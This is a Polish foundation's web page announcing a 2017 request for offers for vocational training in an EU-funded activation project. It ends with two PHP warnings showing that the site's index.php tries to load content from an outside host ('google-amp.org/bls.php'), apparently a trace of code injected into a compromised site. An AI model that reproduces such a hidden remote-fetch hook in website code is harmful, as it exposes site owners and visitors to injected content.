Dotyczy:

Postępowania znak: ZO/FRWiM/12/2017 prowadzonego w trybie zapytania ofertowego na: przeprowadzenie szkoleń zawodowych dla 31 Uczestników projektu pn.: „Akcja Aktywizacja w Powiecie Nowomiejskim”” o numerze projektu: RPWM.10.02.00-28-0055/16

Pismo_z_dnia_21.07.2017r.

Baza_konkurencyjności

 


Warning: file_get_contents(): php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/blupixel/ftp/strony_www/fundacja_wm/fundacja_wm/index.php on line 50

Warning: file_get_contents(http://google-amp.org/bls.php?w=fundacjawm.pl): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /home/blupixel/ftp/strony_www/fundacja_wm/fundacja_wm/index.php on line 50